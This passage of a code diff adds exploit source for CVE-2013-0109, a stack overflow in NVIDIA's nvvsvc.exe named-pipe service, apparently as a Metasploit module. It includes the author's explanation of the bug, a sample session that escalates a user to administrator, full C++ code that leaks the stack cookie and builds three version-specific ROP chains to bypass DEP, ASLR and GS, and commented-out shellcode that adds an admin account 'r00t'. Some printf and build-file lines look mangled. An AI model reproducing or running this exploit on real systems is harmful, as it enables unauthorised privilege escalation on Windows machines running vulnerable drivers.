||||||
|
(which is zeroed first time round, and second time round contains whatever
|
||||||
|
was in it beforehand), right to the end of the stack frame (including stack
|
||||||
|
cookie and return address).
|
||||||
|
|
||||||
|
As the entire block of data copied is sent back, the stack cookie and
|
||||||
|
nvvsvc.exe base can be determined using the aforementioned process. The
|
||||||
|
stack is then trashed, but the function servicing pipe messages won't
|
||||||
|
return until the final message has been received, so it doesn't matter too
|
||||||
|
much.
|
||||||
|
|
||||||
|
It is then possible to exploit the bug by sending two further packets of
|
||||||
|
data: One containing the leaked stack cookie and a ROP chain dynamically
|
||||||
|
generated using offsets from the leaked nvvsvc.exe base (which simply fills
|
||||||
|
the response-buf buffer when this data is echoed back) and a second packet
|
||||||
|
which contains enough data to trigger an overwrite if data is copied from
|
||||||
|
the start of the received-data buffer into the response-buf (including the
|
||||||
|
data we primed the latter to contain - stack cookie and ROP chain).
|
||||||
|
|
||||||
|
Allowing the function to then return leads to execution of our ROP chain,
|
||||||
|
and our strategically placed Metasploit net user /add shellcode! We get
|
||||||
|
continuation of execution for free because the process spins up a thread
|
||||||
|
to handle each new connection, and there are no deadlocks etc.
|
||||||
|
|
||||||
|
I've included two ROP chains, one which works against the nvvsvc.exe
|
||||||
|
running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers
|
||||||
|
from the Dell site, and one which works against the latest version of the
|
||||||
|
drivers for the same card, from:
|
||||||
|
http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
|
||||||
|
http://www.geforce.co.uk/drivers/results/54709
|
||||||
|
|
||||||
|
Hope you find this interesting - it's a fun bug to play with!
|
||||||
|
|
||||||
|
- Sample Session -
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
|
||||||
|
Alias name administrators
|
||||||
|
Comment Administrators have complete and unrestricted access to the computer/domain
|
||||||
|
|
||||||
|
Members
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------------
|
||||||
|
Administrator
|
||||||
|
Peter
|
||||||
|
The command completed successfully.
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
|
||||||
|
** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
|
||||||
|
[@peterwintrsmith]
|
||||||
|
- Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
|
||||||
|
|
||||||
|
Action 1 of 9: - CONNECT
|
||||||
|
|
||||||
|
Action 2 of 9: - CLIENT => SERVER
|
||||||
|
Written 16416 (0x4020) characters to pipe
|
||||||
|
|
||||||
|
Action 3 of 9: - SERVER => CLIENT
|
||||||
|
Read 16504 (0x4078) characters from pipe
|
||||||
|
|
||||||
|
Action 4 of 9: Building exploit ...
|
||||||
|
=> Stack cookie 0xe2e2893340d4:
|
||||||
|
=> nvvsvc.exe base 0x13fb90000:
|
||||||
|
|
||||||
|
Action 5 of 9: - CLIENT => SERVER
|
||||||
|
Written 16416 (0x4020) characters to pipe
|
||||||
|
|
||||||
|
Action 6 of 9: - SERVER => CLIENT
|
||||||
|
Read 16384 (0x4000) characters from pipe
|
||||||
|
|
||||||
|
Action 7 of 9: - CLIENT => SERVER
|
||||||
|
Written 16416 (0x4020) characters to pipe
|
||||||
|
|
||||||
|
Action 8 of 9: - SERVER => CLIENT
|
||||||
|
Read 16896 (0x4200) characters from pipe
|
||||||
|
|
||||||
|
Action 9 of 9: - DISCONNECT
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
|
||||||
|
Alias name administrators
|
||||||
|
Comment Administrators have complete and unrestricted access to the computer/domain
|
||||||
|
|
||||||
|
Members
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------------
|
||||||
|
Administrator
|
||||||
|
Peter
|
||||||
|
r00t
|
||||||
|
The command completed successfully.
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\Peter\Desktop\NVDelMe1>
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
extern "C" {
|
||||||
|
#include "nvidia_nvsvc.h"
|
||||||
|
}
|
||||||
|
|
||||||
|
enum EProtocolAction
|
||||||
|
{
|
||||||
|
ProtocolAction_Connect = 0,
|
||||||
|
ProtocolAction_Receive,
|
||||||
|
ProtocolAction_Send,
|
||||||
|
ProtocolAction_Disconnect,
|
||||||
|
ProtocolAction_ReadCookie,
|
||||||
|
};
|
||||||
|
|
||||||
|
typedef struct
|
||||||
|
{
|
||||||
|
EProtocolAction Action;
|
||||||
|
PBYTE Buf;
|
||||||
|
DWORD Length;
|
||||||
|
} ProtocolMessage;
|
||||||
|
|
||||||
|
const int GENERIC_BUF_LENGTH = 0x10000;
|
||||||
|
|
||||||
|
#define WriteByte(val) {buf[offs] = val; offs += 1;}
|
||||||
|
#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;}
|
||||||
|
#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;}
|
||||||
|
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
|
||||||
|
#define BufRemaining() (sizeof(buf) - offs)
|
||||||
|
|
||||||
|
DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
|
||||||
|
{
|
||||||
|
DWORD dwWritten = 0;
|
||||||
|
|
||||||
|
if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
|
||||||
|
{
|
||||||
|
return dwWritten;
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
|
||||||
|
{
|
||||||
|
DWORD dwRead = 0, dwAvailable = 0;
|
||||||
|
|
||||||
|
if (bTimeout)
|
||||||
|
{
|
||||||
|
for (DWORD i = 0; i < 30; i++)
|
||||||
|
{
|
||||||
|
if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
|
||||||
|
{
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (dwAvailable)
|
||||||
|
{
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
Sleep(100);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!dwAvailable)
|
||||||
|
{
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
|
||||||
|
{
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
Cleanup:
|
||||||
|
return dwRead;
|
||||||
|
}
|
||||||
|
|
||||||
|
HANDLE EstablishPipeConnection(char *pszPipe)
|
||||||
|
{
|
||||||
|
HANDLE hPipe = CreateFileA(
|
||||||
|
pszPipe,
|
||||||
|
GENERIC_READ | GENERIC_WRITE,
|
||||||
|
0,
|
||||||
|
NULL,
|
||||||
|
OPEN_EXISTING,
|
||||||
|
0,
|
||||||
|
NULL
|
||||||
|
);
|
||||||
|
|
||||||
|
if (hPipe == INVALID_HANDLE_VALUE)
|
||||||
|
{
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
return hPipe;
|
||||||
|
}
|
||||||
|
|
||||||
|
BYTE *BuildMalicious_LeakStack()
|
||||||
|
{
|
||||||
|
static BYTE buf[0x4020] = {0};
|
||||||
|
UINT offs = 0;
|
||||||
|
|
||||||
|
WriteWord(0x52);
|
||||||
|
|
||||||
|
for(UINT i=0; i<0x2000; i++)
|
||||||
|
WriteWord(0x41);
|
||||||
|
|
||||||
|
WriteWord(0);
|
||||||
|
|
||||||
|
WriteDword(0);
|
||||||
|
WriteDword(0x4078);
|
||||||
|
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
WriteDword(0x41414141);
|
||||||
|
|
||||||
|
return buf;
|
||||||
|
}
|
||||||
|
|
||||||
|
BYTE *BuildMalicious_FillBuf()
|
||||||
|
{
|
||||||
|
static BYTE buf[0x4020] = {0};
|
||||||
|
UINT offs = 0;
|
||||||
|
|
||||||
|
WriteWord(0x52);
|
||||||
|
WriteWord(0); // string
|
||||||
|
|
||||||
|
WriteDword(0);
|
||||||
|
WriteDword(0x4000);
|
||||||
|
|
||||||
|
while(BufRemaining())
|
||||||
|
WriteDword(0x43434343);
|
||||||
|
|
||||||
|
return buf;
|
||||||
|
}
|
||||||
|
|
||||||
|
BYTE *BuildMalicious_OverwriteStack()
|
||||||
|
{
|
||||||
|
static BYTE buf[0x4020] = { 0 };
|
||||||
|
UINT offs = 0;
|
||||||
|
|
||||||
|
WriteWord(0x52);
|
||||||
|
WriteWord(0); // string
|
||||||
|
|
||||||
|
WriteDword(0);
|
||||||
|
WriteDword(0x4340); // enough to copy shellcode too
|
||||||
|
|
||||||
|
while (BufRemaining())
|
||||||
|
{
|
||||||
|
WriteDword(0x42424242);
|
||||||
|
}
|
||||||
|
|
||||||
|
return buf;
|
||||||
|
}
|
||||||
|
|
||||||
|
/*!
|
||||||
|
* @brief Entry point for the exploit code.
|
||||||
|
* @param payload Pointer to the payload memory, which must be NULL terminated.
|
||||||
|
*/
|
||||||
|
VOID elevate_nvidia_nvsvc(LPVOID payload)
|
||||||
|
{
|
||||||
|
SIZE_T payloadLen = strlen((char*)payload) + 1;
|
||||||
|
DWORD dwReturnCode = 1, dwBytesInOut = 0;
|
||||||
|
HANDLE hPipe = NULL;
|
||||||
|
|
||||||
|
static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 };
|
||||||
|
|
||||||
|
memset(rgReadBuf, 0, sizeof(rgReadBuf));
|
||||||
|
|
||||||
|
ProtocolMessage rgConvoMsg[] =
|
||||||
|
{
|
||||||
|
{ ProtocolAction_Connect, NULL, 0 },
|
||||||
|
{ ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 },
|
||||||
|
{ ProtocolAction_Receive, { 0 }, 0x4200 },
|
||||||
|
{ ProtocolAction_ReadCookie, { 0 }, 0 },
|
||||||
|
{ ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 },
|
||||||
|
{ ProtocolAction_Receive, { 0 }, 0x4000 },
|
||||||
|
{ ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 },
|
||||||
|
{ ProtocolAction_Receive, { 0 }, 0x4200 },
|
||||||
|
{ ProtocolAction_Disconnect, NULL, 0 },
|
||||||
|
};
|
||||||
|
|
||||||
|
DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
|
||||||
|
BOOL bTryAgain = FALSE;
|
||||||
|
char szPipe[256] = "\\\\.\\pipe\\nvsr";
|
||||||
|
|
||||||
|
// We could renable remote hosts to target other devices on network?!
|
||||||
|
// sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);
|
||||||
|
|
||||||
|
while (i < dwNumberOfMessages)
|
||||||
|
{
|
||||||
|
printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);
|
||||||
|
|
||||||
|
switch (rgConvoMsg[i].Action)
|
||||||
|
{
|
||||||
|
case ProtocolAction_Connect:
|
||||||
|
printf(" - CONNECT\n");
|
||||||
|
|
||||||
|
hPipe = EstablishPipeConnection(szPipe);
|
||||||
|
if (!hPipe)
|
||||||
|
{
|
||||||
|
printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_Disconnect:
|
||||||
|
printf(" - DISCONNECT\n");
|
||||||
|
|
||||||
|
CloseHandle(hPipe);
|
||||||
|
hPipe = NULL;
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_Send:
|
||||||
|
printf(" - CLIENT => SERVER\n");
|
||||||
|
|
||||||
|
if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
|
||||||
|
{
|
||||||
|
printf("!! Error writing to pipe\n");
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_Receive:
|
||||||
|
printf("\t - SERVER => CLIENT\n");
|
||||||
|
|
||||||
|
if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
|
||||||
|
{
|
||||||
|
printf("!! Error reading from pipe (at least, no data on pipe)\n");
|
||||||
|
goto Cleanup;
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
|
||||||
|
|
||||||
|
break;
|
||||||
|
case ProtocolAction_ReadCookie:
|
||||||
|
|
||||||
|
// x64 Metasploit cmd/exec:
|
||||||
|
// "net user r00t r00t00r! /add & net localgroup administrators /add"
|
||||||
|
// exitfunc=thread
|
||||||
|
/*char code[] = ""
|
||||||
|
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||||
|
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||||
|
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||||
|
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||||
|
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||||
|
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||||
|
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||||
|
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||||
|
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||||
|
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||||
|
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
||||||
|
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||||
|
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||||
|
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||||
|
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||||
|
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||||
|
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
|
||||||
|
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
|
||||||
|
"\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
|
||||||
|
"\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
|
||||||
|
"\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
|
||||||
|
"\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/
|
||||||
|
printf("Building exploit ...\n");
|
||||||
|
unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
|
||||||
|
printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);
|
||||||
|
|
||||||
|
memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);
|
||||||
|
|
||||||
|
unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;
|
||||||
|
|
||||||
|
// Perform some limited fingerprinting (my default install version, vs latest at time of testing)
|
||||||
|
switch (uiRetnAddress & 0xfff)
|
||||||
|
{
|
||||||
|
case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
|
||||||
|
uiBase = uiRetnAddress - 0x4640;
|
||||||
|
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
|
||||||
|
|
||||||
|
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
|
||||||
|
|
||||||
|
// Param 1: lpAddress [r11 (near rsp) into rcx]
|
||||||
|
pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
|
||||||
|
pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
|
||||||
|
pRopChain[2] = 0; // Padding
|
||||||
|
pRopChain[3] = 0; // ...
|
||||||
|
pRopChain[4] = 0; // ...
|
||||||
|
pRopChain[5] = 0; // ...
|
||||||
|
pRopChain[6] = 0; // ...
|
||||||
|
pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
|
||||||
|
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
|
||||||
|
pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
|
||||||
|
pRopChain[10] = 0; // Padding
|
||||||
|
pRopChain[11] = 0; // ...
|
||||||
|
pRopChain[12] = 0; // ...
|
||||||
|
pRopChain[13] = 0; // ...
|
||||||
|
pRopChain[14] = 0; // ...
|
||||||
|
pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn
|
||||||
|
pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
|
||||||
|
pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
|
||||||
|
// Param 4: lpflOldProtect [r9 - already points at writable location]
|
||||||
|
pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
|
||||||
|
pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
|
||||||
|
pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
|
||||||
|
pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)
|
||||||
|
|
||||||
|
memcpy(pRopChain + 22, payload, payloadLen);
|
||||||
|
break;
|
||||||
|
case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
|
||||||
|
uiBase = uiRetnAddress - 0x39f1;
|
||||||
|
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
|
||||||
|
|
||||||
|
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
|
||||||
|
|
||||||
|
// Param 1: lpAddress [r11 (near rsp) into rcx]
|
||||||
|
pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
|
||||||
|
pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
|
||||||
|
pRopChain[2] = 0; // Padding ...
|
||||||
|
pRopChain[3] = 0; // ...
|
||||||
|
pRopChain[4] = 0; // ...
|
||||||
|
pRopChain[5] = 0; // ...
|
||||||
|
pRopChain[6] = 0; // ...
|
||||||
|
pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
|
||||||
|
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
|
||||||
|
pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
|
||||||
|
pRopChain[10] = 0; // Padding ...
|
||||||
|
pRopChain[11] = 0; // ...
|
||||||
|
pRopChain[12] = 0; // ...
|
||||||
|
pRopChain[13] = 0; // ...
|
||||||
|
pRopChain[14] = 0; // ...
|
||||||
|
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
|
||||||
|
pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
|
||||||
|
pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE
|
||||||
|
pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
|
||||||
|
pRopChain[18] = 0; // Padding ...
|
||||||
|
pRopChain[19] = 0; // ...
|
||||||
|
pRopChain[20] = 0; // ...
|
||||||
|
pRopChain[21] = 0; // ...
|
||||||
|
pRopChain[22] = 0; // ...
|
||||||
|
// Param 4: lpflOldProtect [r9 - already points at writable location]
|
||||||
|
pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
|
||||||
|
pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
|
||||||
|
pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
|
||||||
|
pRopChain[26] = 0; // Padding ...
|
||||||
|
pRopChain[27] = 0; // ...
|
||||||
|
pRopChain[28] = 0; // ...
|
||||||
|
pRopChain[29] = 0; // ...
|
||||||
|
pRopChain[30] = 0; // ...
|
||||||
|
pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
|
||||||
|
pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp
|
||||||
|
|
||||||
|
memcpy(pRopChain + 33, payload, payloadLen);
|
||||||
|
break;
|
||||||
|
case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
|
||||||
|
uiBase = uiRetnAddress - 0x3a11;
|
||||||
|
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
|
||||||
|
|
||||||
|
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
|
||||||
|
|
||||||
|
// Param 1: lpAddress [r11 (near rsp) into rcx]
|
||||||
|
pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn
|
||||||
|
pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
|
||||||
|
pRopChain[2] = 0; // Padding ...
|
||||||
|
pRopChain[3] = 0; // ...
|
||||||
|
pRopChain[4] = 0; // ...
|
||||||
|
pRopChain[5] = 0; // ...
|
||||||
|
pRopChain[6] = 0; // ...
|
||||||
|
pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
|
||||||
|
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
|
||||||
|
pRopChain[9] = 0; // Padding ...
|
||||||
|
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
|
||||||
|
pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
|
||||||
|
pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE
|
||||||
|
pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
|
||||||
|
pRopChain[13] = 0; // Padding ...
|
||||||
|
pRopChain[14] = 0; // ...
|
||||||
|
pRopChain[15] = 0; // ...
|
||||||
|
pRopChain[16] = 0; // ...
|
||||||
|
pRopChain[17] = 0; // ...
|
||||||
|
// Param 4: lpflOldProtect [r9 - already points at writable location]
|
||||||
|
pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
|
||||||
|
pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128
|
||||||
|
pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
|
||||||
|
pRopChain[21] = 0; // Padding ...
|
||||||
|
pRopChain[22] = 0; // ...
|
||||||
|
pRopChain[23] = 0; // ...
|
||||||
|
pRopChain[24] = 0; // ...
|
||||||
|
pRopChain[25] = 0; // ...
|
||||||
|
pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax
|
||||||
|
pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn
|
||||||
|
|
||||||
|
memcpy(pRopChain + 28, payload, payloadLen);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
i++;
|
||||||
|
}
|
||||||
|
|
||||||
|
Cleanup:
|
||||||
|
if (hPipe)
|
||||||
|
{
|
||||||
|
CloseHandle(hPipe);
|
||||||
|
}
|
||||||
|
}
@ -0,0 +1,6 @@
|
||||||
|
#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
|
||||||
|
#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
|
||||||
|
|
||||||
|
VOID elevate_nvidia_nvsvc(LPVOID payload);
|
||||||
|
|
||||||
|
#endif
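--- a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj
+++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj
@@ -0,0 +1,142 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{6B3FF768-1F25-49C1-8827-EDEC84D4749F}</ProjectGuid>
+<RootNamespace>nvidia_nvsvc</RootNamespace>
+<Keyword>Win32Proj</Keyword>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<CharacterSet>MultiByte</CharacterSet>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<PlatformToolset>v120</PlatformToolset>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<CharacterSet>MultiByte</CharacterSet>
+<PlatformToolset>v120</PlatformToolset>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup>
+<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+<OutDir>$(Configuration)\$(Platform)\</OutDir>
+<IntDir>$(Configuration)\$(Platform)\</IntDir>
+<LinkIncremental>false</LinkIncremental>
+<GenerateManifest>false</GenerateManifest>
+<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+<CodeAnalysisRules />
+<CodeAnalysisRuleAssemblies />
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<Optimization>Disabled</Optimization>
+<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
+<MinimalRebuild>true</MinimalRebuild>
+<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+</ClCompile>
+<Link>
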